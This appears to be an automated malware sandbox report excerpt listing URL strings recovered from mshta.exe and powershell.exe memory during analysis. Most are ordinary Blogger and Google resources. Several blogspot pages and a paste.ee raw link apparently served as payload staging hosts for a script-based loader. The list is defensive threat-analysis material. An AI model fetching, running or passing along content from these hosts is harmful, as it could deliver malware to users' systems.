Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmp	String found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp	String found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogs
Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/(
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/Q
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/search
Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp	String found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmp	String found in binary or memory: https://paste.ee/r/9IDWy
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmp	String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmp	String found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp	String found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp	String found in binary or memory: https://www.blogger.com/rpc_relay.html
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp	String found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
